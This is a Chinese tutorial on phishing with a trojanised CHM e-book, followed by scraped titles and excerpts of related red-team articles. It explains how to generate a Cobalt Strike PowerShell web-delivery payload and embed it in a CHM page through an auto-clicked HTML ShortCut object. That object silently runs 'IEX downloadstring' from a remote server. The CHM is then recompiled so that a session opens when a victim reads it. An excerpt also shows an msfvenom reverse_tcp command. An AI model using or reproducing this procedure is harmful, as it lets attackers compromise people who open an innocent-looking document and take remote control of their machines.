1.对CS进行设置

服务端配置CS-客户端打开-攻击-钓鱼攻击-脚本web传递-配置选择监听器-设置端口-选择类型为power shell-点击开始-复制生成的利用代码

2.对当前.CHM电子书进行解压

进入文件后选择任意文件夹进入

3.这里演示:进入-设备管理-打开setleds.html

4.把CS生成的利用代码插入到body里面去

利用代码:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:88/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>

5. 插入完成后利用Easy CHM对解压后的电子书文件进行重新打包

6.新建-工程目录(电子书解压后的文件目录)-确定-点击编译-设置CHM保存

7.最后点击生成

8.下面打开电子书,看下CS会不会上线-成功上线

钓鱼篇-CHM电子书上线CS相关推荐

  1. 钓鱼篇-利用快捷方式上线CS

    这里会用到windows中的mshta,用于执行hta文件 mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记 ...

  2. 钓鱼篇-利用RLO隐藏exe文件捆绑office免杀-远程模板加载上线CS

    RLO伪装图片执行 利用msf生成木马x.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 ...

  3. 【内网渗透】利用非常规手段突破安全策略上线CS

    前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...

  4. 【红队APT】钓鱼篇Office-CVE漏洞RLO隐藏压缩包释放免杀打包捆绑

    文章目录 文件后缀-钓鱼伪装-RLO 压缩文件-自解压-释放执行 Office套件-CVE漏洞-MSF&CS Microsoft MSDT CVE-2022-30190 代码执行 Micros ...

  5. 渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五)

    ** 渗透测试-地基钓鱼篇-Cobalt Strike钓鱼(二十五) ** 作者:大余 时间:2020-12-17 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录 ...

  6. 建站四部曲之前端显示篇(React+上线)

    本系列分为四篇: 建站四部曲之后端接口篇(SpringBoot+上线) 建站四部曲之Python数据爬虫篇(selenium) 建站四部曲之前端显示篇(React+上线) 建站四部曲之移动端篇(And ...

  7. Android 中文API合集(4)(102篇)(chm格式)

    前言 Android中文翻译组 , Android 中文chm , Android 中文pdf , android 中文 api Android中文翻译组第四个chm格式合集,收集整理102篇译文制作 ...

  8. 漏洞复现:通过CVE-2022-30190上线CS

    免责声明:本文章仅供学习和研究使用,严禁使用该文章内容对互联网资产进行任何未授权的非法操作!若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守 ...

  9. 批处理+Linux书籍+黑客编程+脚本攻防+逆向工程书籍+海量资源(pdf+chm电子书)

    TOOLS论坛内部文章打包.CHM http://yunfile.com/file/yunkey/0955157e/ 精通脚本黑客 http://yunfile.com/file/yunkey/636 ...

  10. CHM电子书反向编译器及注册机

    CHM电子书反向编译器是一款专门用来反编译CHM电子书源文件的工具软件,可以迅速地释放包括在CHM电子书里面的全部源文件(包括网页.文本.图片.CHM.ZIP.EXE等全部源文件),并且完美地恢复源文 ...

最新文章

  1. Admin注册和路由分发详解
  2. Mac下Selenium无法最大化Chrome解决方案
  3. python 日历_python中的日历和时间
  4. USACO SEC.1.2 No.4 Palindromic Squares
  5. Ecplise中的Maven项目提示找不到jar包
  6. 爬虫-urlencode与parse_qs函数
  7. autoline 手册
  8. 阻塞非阻塞,同步异步四种I/O方式
  9. 【软件-ACDSee】图像合并为TIFF
  10. python在冒号处显示语法错误_python中的语法错误
  11. 一生要看的50部经典电影
  12. HDFS与HBASE的动态节点的扩容(增删)小白级(二)
  13. css3的animation动画属性实现闹钟左右摇摆
  14. 关于直播的iOS开发
  15. 这是你不曾见过的最全的ASO应用市场优化方式(中篇)
  16. JAVA中关于可变和不可变类型的理解
  17. synchronized关键字
  18. Jaeger-分布式调用链跟踪系统理论与实战
  19. 微信小程序云开发——有数据却拿不到数据
  20. 出海商家涌向东南亚,先行一步的跨境MCN是引流捷径吗?

热门文章

  1. java lob_oracle数值类型--LOB类型
  2. oracle dbms_lob trim,Oracle - DBMS_LOB函数和用法
  3. 模拟实现库函数之字符串函数
  4. 【快乐离散数学】谓词与量词 | 嵌套量词 | 狄摩根定律 | Predicates and Quantifiers | Nested Quantifiers
  5. iOS--相册视频MOV转MP4
  6. 场景设计题 汇总 (一)
  7. 计算机DVD驱动禁用怎么恢复,设备管理器中找不到dvd驱动器 怎么恢复 - 驱动管家...
  8. FMI飞马网【线上直播】京东POP接口自动化测试
  9. 关于计算机教学的论文,关于计算机教学论文.docx
  10. 怎么把视频复制到IPAD